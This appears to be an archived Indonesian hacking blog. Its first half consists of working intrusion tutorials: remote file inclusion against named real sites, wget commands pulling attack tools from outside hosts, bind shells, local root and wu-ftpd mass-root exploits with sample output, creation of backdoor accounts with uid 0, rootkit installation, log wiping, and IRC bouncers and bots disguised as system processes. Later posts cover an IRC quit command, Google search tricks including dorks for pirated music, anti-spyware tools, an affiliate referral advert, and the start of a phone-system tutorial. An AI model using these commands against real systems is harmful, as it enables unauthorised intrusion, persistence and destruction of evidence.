Ketika anda bosan dengan memamerkan keahlian protokol yang baru anda temukan, anda dapat keluar dari server tersebut dengan perintah QUIT. Penggunaan perintah ini akan menyebabkan server tersebut menutup koneksi anda.

QUIT

Perintah QUIT dapat menggunakan parameter opsi. Parameter tersebut harus didahului dengan sebuah karakter ‘:’ apapun yang anda ketikan akan ditampilkan ke user lain, sebagai alasan mengapa anda keluar dari server tersebut.

QUIT :Telnet is cool!

Apapun metode yang anda gunakan untuk keluar dari server, sebelum disconnect, akan merespon dengan suatu baris:

ERROR :Closing Link: si_cebol (Client Quit)

Juga dimungkinkan untuk anda menutup koneksi dengan menutup Telnet, namun ahal ini tidak memungkinkan anda untuk mengetikan alasan anda keluar dari server tersebut.

Bila seluruh perintah diketik dalam huruf kapital, anda mungkin menemukan bahwa kebanyakan server bsia menerima kebijakan tersebut. Saat ini yang anda mengetahui apa yang harus diketik untuk terhubung ke IRC server, berikutnya kita akan belajar membuat program yang menghubungkan diri kita ke IRC server.

Salam.

Sumber :
Indonewbies.tk


Tembak IP

Penulis (th3sn0wbr4in) mengaggap bahwa temen-temen yang baca tulisan ini sudah bisa menginjek-injek
Target, dan mengerti sedikit tentang pengalamatan IP Address. Karena kalau belum 'biasa' injek, pasti
akan malu-malu dan gugup(xixixixixi) dan tentang Pengalamatan IP Address kalau ga tau sama sekali tentu
target yang akan lo tembak ga' bakal disconnect atau down.
Nah, kalau udah bisa inject dan mengerti sedikit tentang pengalamatan IP, langsung dech...







0o0 Pertama-tama Lo harus punya server yang siap inject [Klo' blom punya cari aja di Google.
th3sn0wbr4in punya nich sedikit target dan Bug-bug yang 'Mudah-mudahan' masih bisa dipake di sini

0o0 Untuk contoh ini gw pake Bug PHPLiveHelper dan Keyword untuk mencari targetnya di Google Gw coba
allinurl:"/PHPLiveHelper/*.php"

0o0 Gw coba salah satu hasil pencarian dari Google, yaitu http://www.maldivesrds.com/phplivehelper/mail.php?
ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&livename=

0o0 Hapus tulisan /mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&
livename= dan tambahkan Bug dibelakang alamat URL targetnya, sehingga alamat targetnya menjadi
http://www.maldivesrds.com/phplivehelper/initiate.php?abs_path=http://freewebs.com/th3sn0wbr4in/tusuk.htm?

0o0 Nah...bisa di-inject kan...? Kita lihat UID - nya adalah nobody(99), gapapa dech...

0o0 Cari Direktory yang bisa ditulis ama user nobody. Seperti biasa, ketik command linuxnya. Lo bisa ketik
find / -type d -perm 777 atau find / -type d -user nobody nah nanti banyak tuch yang keluar...
/* Maksud dari command 1 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, dengan permisi
777 (rwx) untuk siapapun, termasuk user nobody */
/* Maksud dari command 2 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, milik user nobody.
Karena pemilik Directory bisa melakukan apapun pada Directory miliknya */
Cari dibelakangnya ga' ada tulisan Permission Denied, copy dan paste di paste di Field Directory di PHPShell kamu
dan [Enter]. Kalau semua ada tulisan Permission Denied, coba saja Directory /tmp, karena biasanya bermode 777.

0o0 Download file untuk tembak dengan menggunakan wget. Ketik wget http://freewebs.com/th3sn0wbr4in/tembak.c.
Jika wget tidak bisa digunakan (Command not found atau denied) gunakan lwp-download.
Ketik lwp-download http://freewebs.com/th3sn0wbr4in/tembak.c dan [Enter] aja langsung.
Kalau anda menggunakan wget akan keluar keterangan di PHPShell lo, +- seperti ini :





--02:39:51-- http://freewebs.com/th3sn0wbr4in/tembak.c
=> `tembak.c'
Resolving freewebs.com... 38.119.100.2
Connecting to freewebs.com[38.119.100.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,744 [text/x-csrc]

0K ... 100% 30.89 KB/s

02:39:51 (30.89 KB/s) - `Sambit.c' saved [3764/3764]

Nah, kalau udah muncul tulisan saved berarti udah kedownload filenya...
0o0 Compile file tembak.c tadi biar jadi file Executeable (kalau di WinDo$t Ekstensinya .exe kalau di Linux
tidak menggunakan Ekstensi).
Ketik gcc tembak.c -o tembak
Maksud Command di atas adalah menjalankan gcc, compile file tembak.c (Source Code C) dengan Output
file bernama tembak. Jadi nama tembak bisa lo ganti sesuai selera

0o0 Nah...sekarang, jalankan file tembak tadi. Ketik apa...?

0o0 ./tembak 219.83.4.68 80
0x01 ./ adalah Directory tempat kita menaruh file tembak
0x02 219.83.4.68 IP Warnet tempat gw maen
0x03 80 No Port. 80 untuk HTTP a.k.a Browsing
Untuk apa itu port. Stop tanya terus, buka Google! Cari yang ingin Lo cari!
0o0 Penutup
Akankah kita tetap menjadi anak kecil...? tanpa memberikan penghargaan terhadap penulis...?
atau anda masih berpegang teguh kepada pemikiran anak anak anda dengan merubah identitas
asli penulis dan kemudian mencantumkan nama anda sebagai author disini...?
Kenapa hal ini sering saya sampaikan...? karena Indonesia di mata komunitas IT luar negeri
sering dicap sebagai plagiator dan sering seenaknya mencantumkan kata `author` yang sebenarnya
mereka hanya meng-edit sedikit dari paper yang orang lain tulis, kadangkala mereka sendiri tidak
mengerti apa maksud dibalik tulisan tersebut.


Pasang Back Door

-*-------------------*-
-*- pasang backd00R -*-
-*-------------------*-


=====================
install shell php
=====================
###contohnya
http://livron.port5.com/mail.php <---------ini source shell
misalnya:
http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php -O log.php
bila keluar pesan "permission denied" cari lah folder lain yang bisa untuk wget shell.php kita
kalo bisa... buka:
http://www.target.org/modules/My_eGallery/public/log.php

==============
pasang bindtty
==============
###http://student.te.ugm.ac.id/~phoenix03/audit/bindedit.c
gcc -o /var/tmp/bind /var/tmp/bind.c;/var/tmp/bind 4000
diatas kita menggunakan port 4000 sebagai binding port, sekarang cek apakah port
4000 terbuka, scan dengan phnxscan.c yang dibuat penulis, anda dapat mendownload
source kodenya di http://student.te.ugm.ac.id/~phoenix03/tutorial/phnxscan.c. Kompile
dan ekskusi script tadi menggunakan gcc dan scanlah port 4000 servet www.target.com.
myshell~>gcc -o phnxscan phnxscan.c
myshell~> ping -c 2 target.com
PING target.com (210.189.77.28): 56 data bytes
64 bytes from 210.189.77.28: icmp_seq=0 ttl=38 time=428.044 ms
64 bytes from 210.189.77.28: icmp_seq=1 ttl=38 time=428.624 ms
--- target.com ping statistics ---
2 packets transmitted, 2 packets received, 0.0% packet loss
round-trip min/avg/max/std-dev = 428.044/428.334/428.624/0.290 ms
myshell~> phnxscan -p 4000 -s 210.189.77.28
port 4000 (tcp) terbuka
Telnet server target port 4000, jika berhasil maka anda akan disuruh memasukkan
password yang default dari scriptnya changeme
myshell~> telnet 210.189.77.28 4000
Trying 210.189.77.28...
Connected to target.com (210.189.77.28).
Escape character is '^]'.
---------------------------------------------------
#### cd /var/tmp ; wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd
baru bikin file exekusi
chmod 755 /tmp/httpd
----------------------------------------------------
#### cd /var/tmp ; wget www.renjana.ws/~toa/bindtty
cd /var/tmp ; chmod 755 bindtty
cd /var/tmp ; ./bindtty
----------------------------------------------------





# test pake `uname -a` < kernel 2.4.20 ke bawah yg bisa
wget http://roseofworld.org/shell.tar
tar -zxvf shell.tar; cd webshell; ./1980
# klo uda buka putty > masukkan host > pilih telnet > isi port: 1980
# klo sukses maka akan masuk shell

### pake bind yg laen jika pengen shellnya ada passwd-nya
cd /var/tmp; wget geocities.com/pothei/nmap;chmod 755 nmap; ./nmap
# telnet ke host port 6665 passwd `stimik`

## cd /tmp; wget http://geocities.com/g4ptek/tools/bind.tgz
tar -zxvf bind.tgz;cd .bind; chmod 755 bindtty; ./dssl bindtty
telnet ke host port 6665 passwd `gagal`

## cd /var/tmp; wget http://geocities.com/g4ptek/tools/dns.php
# chmod 755 dns; ./dns
# telnet www.target.com 6029


-*-------------------*-
-*- belajar NgeRoot -*-
-*-------------------*-

### tahap ngeroot di shell yg tadi kita tembus
mkdir /tmp/temp.log
cd /tmp/temp.log
wget http://roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
# jika tidak mendapat pesan error maka kmu sukses, pointer $ akan brubah menjadi #
# cek dengan `id` jika root jgn lupa bagi2 shellnya :p
### atau bisa ambil exploit di www.malanghack.net/alat/
mkdir /tmp/temp.log;cd /tmp/temp.log
wget http://www.malanghack.net/alat/w00t
chmod 755 w00t
./w00t
# jika ga muncul pesan error: you got root man!!
+----------------------------------------------------------------------------------------+

-*-----------------*-
-*- Cracking Root -*-
-*-----------------*-
Tips:
mkdir .bash <--- untuk membuat direktori bash
cd .bash <--- untuk masuk ke direktori bash
mkdir <--- untuk membuat direktory baru
cd <--- untuk masuk ke direktory yg anda mau
cd / <--- untuk keluar dari suatu direktory
rm -rf <--- untuk menghapus file/direktory
-*-----------------------------------------------*-
1. Tahap Pertama :
Cara instalasi Xpost dan ftp

wget http://cyberborneo.b0x.com/xpost.tgz
wget http://cyberborneo.b0x.com/ftp.tgz
tar -zxvf xpost.tgz
tar -zxvf ftp.tgz

-*------*-



2. Tahap Kedua
cd xpost
cd xwurm/
./scan 213.124
setelah dapat wu-scan.log
./masswu wu-scan.log
Setelah didapat pesan sebagai berikut

Trying get root 213.124.151.113 ...
SUCCESS, YOU HAVE ROOT IN 213.124.151.113 ...
Logged in log-root ...

Itu berarti anda telah dapat akses root di IP 213.124.151.113

-*------*-

3. Tahap Ketiga
Buka new sessiom dari putty ssh anda, login kembali ke shell anda

masuk ke direktory ftp anda

cd ftp
./awu 213.124.151.113 ( ip nya)

apabila anda sukses mendapat akses root nya maka akan keluar pesan sbb:

7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version 0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).

# trying to log into 213.124.151.113 with (ftp/mozilla@) ... connected.
# banner: 220 db-depot01 FTP server (Version wu-2.6.1-16) ready.
# successfully selected target from banner

### TARGET: RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]

# 1. filling memory gaps
# 2. sending bigbuf + fakechunk
building chunk: ([0x0807314c] = 0x08085f98) in 238 bytes
# 3. triggering free(globlist[1])
#
# exploitation succeeded. sending real shellcode
# sending setreuid/chroot/execve shellcode
# spawning shell
###################################################################

uid=0(root) gid=0(root) groups=50(ftp)
Linux db-depot01 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown

whoami

root <-- berarti anda sedang dalam akses root

-*------*-

4. Tahap Keempat

Add login akses root anda
----------------------------------------------------------------

1. Cara I

(bukan utk redhat 7.2)
/usr/sbin/useradd rampok -u 0 -d /

passwd -d rampok
passwd rampok

su rampok <<--------untuk super user

2. Cara II

kalo mau dapet acces root ketik :

/usr/sbin/useradd crit -u 0 g- 0 -d /etc/crit
abis itu ketik lagi
passwd crit

wuasu666

Kemudian Add User untuk login shell anda

/usr/sbin/adduser html -g wheel -s /bin/bash -d /etc/html
passwd html
fuck666 2X

-*------*-

5. Tahap Kelima

Pasang backdor ke shell baru anda guna menjaga kemungkinan yg tidak di inginkan

wget www.utay-doyan.cc/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4
./setup pass yang dimau port yang dimau

contoh : --> ./setup wuasu 7000
cd /

wget http://cyberborneo.b0x.com/cleaner.tgz
tar -zxvf cleaner.tgz
cd cleaner
./install

Jangan lupa untuk menghapus file backdor anda tadi untuk menghapus jejak

rm -rf cleaner.tgz

rm -rf shv4.tar.gz

-*------*-

6. Tahap Keenam

Hapus jejak ngeroot anda ketik perintah berikut:

rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /devory
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
ctrl d

SELESAI.....


---------------------------------------------------------------------------------
-*-----------------*-
-*- all IN one -*-
-*-----------------*-
Trik membuat PsyBnc, Menghapus file Log, membuat BACK DOOR , ..... << lengkapnya >>


---------------------------------------------------------------------------------
-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc Yang aman :P~ --*-
-*------------------------------------------*-

mkdir "...." <<-- ini dia direktori kita setelah itu kita masuk ke direktori tersebut
cd "...." <<-- masuk ke direktori
wget wget http://www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh
tar -zxvf .sh
mv psybnc .log
cd .log
make
echo "PSYBNC.SYSTEM.PORT1=110" >> user.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> user.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> user.conf
pwd
/home/scut/..../.log
ketik command:
PATH=$PATH:/home/scut/"...."/.log
mv psybnc "[identd] "
mv scut.conf " "
"[identd] " " "

.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File:
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 11111
psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
[scut@d11303 .log]$


ps -x untuk mengetahui proses di background shell
[scut@d11303 .log]$ ps -x
PID TTY STAT TIME COMMAND
31544 ? S 0:16 ./bash
31629 ? S 0:06 sendmail to scut
2212 pts/1 S 0:00 -bash
2291 pts/1 S 0:00 [identd]
2309 pts/1 R 0:00 ps -x
catatan: 2291 pts/1 S 0:00 [identd] <<-- ini adalah background
psybnc anda yang berubah setelah kita lakukan trik tersebut namun jangan keburu gembira dahulu, karena mungkin admin curiga dengan background yang ada di server tersebut dan admin akan mencarinya dengan:

find | grep psybnc <<-- kemungkinan yang dilakukan karena biasanya admin tahu kalau user selalu run psybnc maka akan nampak nama nama psybnc anda
./log/psybnc.log
./log/psybnc.log.old
./psybncchk
./psybnc.pid

Untuk itu kita perlu mengganti nama nama tersebut dengan yang lain semisal
[scut@d11303 .log]$ mv psybnc.pid .log
[scut@d11303 log]$ mv psybnc.log .sh
[scut@d11303 log]$ mv psybnc.log.old .mud

Dengan cara tersebut kemungkinan sang admin nggak akan curiga terhadap background yang ada di server anda ;) dan yang terakhir jangan lupa bersihkan log anda dengan mengetik command:
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
Atau bisa juga menggunakan remove.c yang ada di situs k-elektronik :) selamat mencoba

-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc II --*-
-*------------------------------------------*-
wget http://www.geocities.com/g4ptek/tools/psy.tar.gz
tar -zxvf psy.tar.gz
rm -rf psy.tar.gz
cd .cgi;
./config 21221;-----------> port ubah sesuai keinginan
./fuck;./run
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000 the most psychoid and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File:ssstt
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 21221
psyBNC2.2.1-cBtITLdDMSNp started (PID 2291)
# usage:
# buka mirc, setting identd bebas, nick bebas
ketik /server www.target.com 21221

-*------------------------------------------*-
-*- Langkah2 membuat PsyBnc II Freebsd --*-
-*------------------------------------------*-
# wget http://www.geocities.com/g4ptek/tools/bnc.tar.gz
# tar -zxvf bnc.tar.gz
# rm -rf bnc.tar.gz
# cd .ls
# chmod 755 ls
# ./ls
-*-----------------------------------*-
-*- Cara Mudah Untuk membuat BOT I -*-
-*-----------------------------------*-

NB: BOT Ini akan otomatis jalan pada server dalnet " Husus Untuk dalnet server "
1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz
atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <--untuk tambahan creat.tcl
2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz
tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2
3. cd .kin
4. ./creat fileconf nick ident IP channel owner

contoh: ./creat defaced s4nd4l_j3p1t s4nd4l 212.88.174.3 defaced g4ptek
defaced.................... file conf yg akan dibuat (akan terbuat dgn sendirinya)
s4nd4l_j3p1t ...............nick bot
s4nd4l ...................ident bot
212.88.174.3 .......IP shell defaced ..................... nama channel, jangan pake #
g4ptek ................ nick owner

catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash)
contoh: mich`keren -> mich\`keren

5. ./eggdrop -m fileconf
atau ./run fileconf fakename
fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat

contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)
Udah deh! tunggu aja di channel, ato whois aja nicknya.
Bila ingin tambahkan tcl lain seperti creat.tcl :

2. ./tcl -t fileconf creat.tcl
contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )
untuk penggunaan bisa diliat dengan command/perintah !creat dichannel

-*-----------------------------------*-
-*- Cara Mudah Untuk membuat BOT II -*-
-*-----------------------------------*-

wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi
# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt
# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/
# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi
./shade "httpd" ./eggdrop -m bot.txt
# usage:
# pv bot kamu di channel
# /msg nick-bot-kamu auth
# /msg nick-bot-kamu pass
# /msg nick-bot-kamu auth

Selamat BikiN Bot....

rewritten on barata jaya SBY, February 6th 2006 by g4ptek

Kamis, 26 Maret 2009

Utilizing search engines

So much information is on the web, its mind boggling. Thankfully we have search
engines to sift through them and catagorize them for us. Unfortunatly, there is still so
much info that even with these search engines, its often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you're looking for.

Lets get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they dont have anything useful to say. I use translation tools like the ones found at

http://babelfish.altavista.com
and

http://world.altavista.com
to translate a few key words I am searching for. Be specific and creative because these tools arent the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal/w SEO (search engine optimization) which seems like a good idea on paper until you do a search for toys and get 5 pornsites in the first 10 results. Using a sites directory will eliminate that. You can narrow your search down easily by looking for the info in specific catagories. (PS google DOES have directories, they're at: directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extention (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extention
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Lets say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other peoples PCs that they dont have their google search preferences saved. When you use google as much as I do, who can afford to not have preferences? They're located on the right of the search box, and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but thats a resolution preference, and 5X's the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

11. Search EVERYWHERE
Use the engine to its fullest. If you dont find your answer in the web section, try the group section. Hell, try a whole different search engine. Dont limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use google, yahoo, and altavista. search the same terms... pretty close, right? Now search for disney death. Funny, altavista has plenty of disney, but no death...hmmm.

If you've read this far into this tutorial without saying, "Great, a guy that copied a few google help pages and thinks its useful info" then I will show you WHY (besides accuracy, speed, and consistancy finding info on ANYTHING) its nice to know how a search engine works. You combine it/w your knowledge of other protocol.

Example:
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you never heard them before, they're a Brazilian heavy metal band that kicks ass. I started with this:
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.



The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

I hope you enjoyed this tutorial, and I saw that recently a book and an article was written on the very same topic. I havn't read them as of yet, but check em out, and get back to me if you feel I missed something important and should include anything else.

intitle:"index of" "google hacks" ebook


Ps. I've said it before, I'll say it again... BE CREATIVE.
You'll be surprised what you can find.


Minggu, 15 Maret 2009

All About Spyware

There are a lot of PC users that know little about "Spyware", "Mal-ware", "hijackers", "Dialers" & many more. This will help you avoid pop-ups, spammers and all those baddies.

What is spy-ware?
Spy-ware is Internet jargon for Advertising Supported software (Ad-ware). It is a way for shareware authors to make money from a product, other than by selling it to the users. There are several large media companies that offer them to place banner ads in their products in exchange for a portion of the revenue from banner sales. This way, you don't have to pay for the software and the developers are still getting paid. If you find the banners annoying, there is usually an option to remove them, by paying the regular licensing fee.

Known spywares
There are thousands out there, new ones are added to the list everyday. But here are a few:
Alexa, Aureate/Radiate, BargainBuddy, ClickTillUWin, Conducent Timesink, Cydoor, Comet Cursor, eZula/KaZaa Toptext, Flashpoint/Flashtrack, Flyswat, Gator, GoHip, Hotbar, ISTbar, Lions Pride Enterprises/Blazing Logic/Trek Blue, Lop (C2Media), Mattel Brodcast, Morpheus, NewDotNet, Realplayer, Songspy, Xupiter, Web3000, WebHancer, Windows Messenger Service.

How to check if a program has spyware?
The is this Little site that keeps a database of programs that are known to install spyware.

Check Here: http://www.spywareguide.com/product_search.php

If you would like to block pop-ups (IE Pop-ups).
There tons of different types out there, but these are the 2 best, i think.

Try: Google Toolbar (http://toolbar.google.com/) This program is Free
Try: AdMuncher (http://www.admuncher.com) This program is Shareware

If you want to remove the "spyware" try these.
Try: Lavasoft Ad-Aware (http://www.lavasoftusa.com/) This program is Free
Info: Ad-aware is a multi spyware removal utility, that scans your memory, registry and hard drives for known spyware components and lets you remove them. The included backup-manager lets you reinstall a backup, offers and multi language support.

Try: Spybot-S&D (http://www.safer-networking.org/) This program is Free
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer. Blocks ActiveX downloads, tracking cookies and other threats. Over 10,000 detection files and entries. Provides detailed information about found problems.

Try: BPS Spyware and Adware Remover (http://www.bulletproofsoft.com/spyware-remover.html) This program is Shareware
Info: Adware, spyware, trackware and big brotherware removal utility with multi-language support. It scans your memory, registry and drives for known spyware and lets you remove them. Displays a list and lets you select the items you'd like to remove.

Try: Spy Sweeper v2.2 (http://www.webroot.com/wb/products/spysweeper/index.php) This program is Shareware
Info: Detects and removes spyware of different kinds (dialers, loggers, trojans, user tracks) from your computer.
The best scanner out there, and updated all the time.

Try: HijackThis 1.97.7 (http://www.spywareinfo.com/~merijn/downloads.html) This program is Freeware
Info: HijackThis is a tool, that lists all installed browser add-on, buttons, startup items and allows you to inspect them, and optionally remove selected items.


If you would like to prevent "spyware" being install.
Try: SpywareBlaster 2.6.1 (http://www.wilderssecurity.net/spywareblaster.html) This program is Free
Info: SpywareBlaster doesn`t scan and clean for so-called spyware, but prevents it from being installed in the first place. It achieves this by disabling the CLSIDs of popular spyware ActiveX controls, and also prevents the installation of any of them via a webpage.

Try: SpywareGuard 2.2 (http://www.wilderssecurity.net/spywareguard.html) This program is Free
Info: SpywareGuard provides a real-time protection solution against so-called spyware. It works similar to an anti-virus program, by scanning EXE and CAB files on access and alerting you if known spyware is detected.

Try: XP-AntiSpy (http://www.xp-antispy.org/) This program is Free
Info: XP-AntiSpy is a small utility to quickly disable some built-in update and authentication features in WindowsXP that may rise security or privacy concerns in some people.




Try: SpySites (http://camtech2000.net/Pages/SpySites_Prog...ml#SpySitesFree) This program is Free
Info: SpySites allows you to manage the Internet Explorer Restricted Zone settings and easily add entries from a database of 1500+ sites that are known to use advertising tracking methods or attempt to install third party software.

If you would like more Information about "spyware".
Check these sites.
http://www.spychecker.com/
http://www.spywareguide.com/
http://www.cexx.org/adware.htm
http://www.theinfomaniac.net/infomaniac/co...rsSpyware.shtml
http://www.thiefware.com/links/
http://simplythebest.net/info/spyware.html

Usefull tools...
Try: Stop Windows Messenger Spam 1.10 (http://www.jester2k.pwp.blueyonder.co.uk/j...r2ksoftware.htm) This program is Free
Info: "Stop Windows Messenger Spam" stops this Service from running and halts the spammers ability to send you these messages.

----------------------------------------------------------------------------
All these softwares will help remove and prevent evil spammers and spywares attacking your PC. I myself recommend getting "spyblaster" "s&d spybot" "spy sweeper" & "admuncher" to protect your PC. A weekly scan is also recommended



Free Virus Scan
Scan for spyware, malware and keyloggers in addition to viruses, worms and trojans. New threats and annoyances are created faster than any individual can keep up with.
http://defender.veloz.com// - 15k


Finding . is a Click Away at 2020Search.com
Having trouble finding what you re looking for on: .? 2020Search will instantly provide you with the result you re looking for by drawing on some of the best search engines the Internet has to offer. Your result is a click away!
http://www.2020search.com// - 43k


Download the BrowserVillage Toolbar.
Customize your Browser! Eliminate Pop-up ads before they start, Quick and easy access to the Web, and much more. Click Here to Install Now!
http://www.browservillage.com/ - 36k

Jumat, 06 Maret 2009

Best Affiliate Site

I found a great Internet company - Cashfiesta.com - that has created a product everyone can benefit from. They pay you while you work or play on your computer. All you need to do is keep their software - the FiestaBar™ - active while you are online. They even pay you when your friends are using their computers.

Free money making opportunity. Join Cashfiesta.com and earn cash.

Unlike other companies, Cashfiesta gives you control over how much money you earn. They have an individual payrate based on the number of Special Offers you sign up for. As some of these offers are free, you can increase your payrate up to 33 times without spending a penny.

Free money making opportunity. Join Cashfiesta.com and earn cash.
It's free and easy to join and your privacy is completely protected. Here is the link, enjoy and happy money making.

http://www.cashfiesta.com/php/join.php?ref=maluqi82

Check it out!

Maman Lukman





Best Affiliate Site

I found a great Internet company - Cashfiesta.com - that has created a product everyone can benefit from. They pay you while you work or play on your computer. All you need to do is keep their software - the FiestaBar™ - active while you are online. They even pay you when your friends are using their computers.

Free money making opportunity. Join Cashfiesta.com and earn cash.

Unlike other companies, Cashfiesta gives you control over how much money you earn. They have an individual payrate based on the number of Special Offers you sign up for. As some of these offers are free, you can increase your payrate up to 33 times without spending a penny.

Free money making opportunity. Join Cashfiesta.com and earn cash.
It's free and easy to join and your privacy is completely protected. Here is the link, enjoy and happy money making.

http://www.cashfiesta.com/php/join.php?ref=maluqi82

Check it out!

Share on M@men

There are different ways to build up your referral network. One is to just tell your friends, family, and other acquaintances about the benefits of being a Cashfiesta member. It only takes a minute to catch their attention - show them a copy of the check you received from Cashfiesta.com, tell them about the special deal offered to you by one of our partners.

Email promotion is another way to approach your friends and acquaintances. Below we have provided a sample email you can use to quickly and efficiently reach a group of friends and acquaintances, but remember - Cashfiesta tolerates ABSOLUTELY NO SPAM.

There are legitimate (no spam) ways to expand your referral network to include people you don't even know. If you are a Webmaster, you can link your web site to Cashfiesta using your referral URL. For linking codes, banners and tips, go to the Webmasters page. Even if you don't have a web site, you can still generate visits to your referral URL and make lots of new referrals by utilizing some of the Referral Tips we have prepared for you.






Rabu, 04 Maret 2009

Phone Systems Tutorial

by The Jolly Roger

To start off, we will discuss the dialing procedures for domestic
as well as international dialing. We will also take a look at the
telephone numbering plan.

North American Numbering Plan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In North America, the telephone numbering plan is as follows:

A) a 3 digit Numbering Plan Area (NPA) code , ie, area code
B) a 7 digit telephone # consisting of a 3 digit Central Office
(CO) code plus a 4 digit station #

These 10 digits are called the network address or destination
code. It is in the format of:

Area Code Telephone #
--------- -----------

N*X NXX-XXXX

Where: N = a digit from 2 to 9
* = the digit 0 or 1
X = a digit from 0 to 9



Area Codes
~~~~~~~~~~

Check your telephone book or the seperate listing of area codes
found on many bbs's. Here are the special area codes (SAC's):

510 - TWX (USA)
610 - TWX (Canada)
700 - New Service
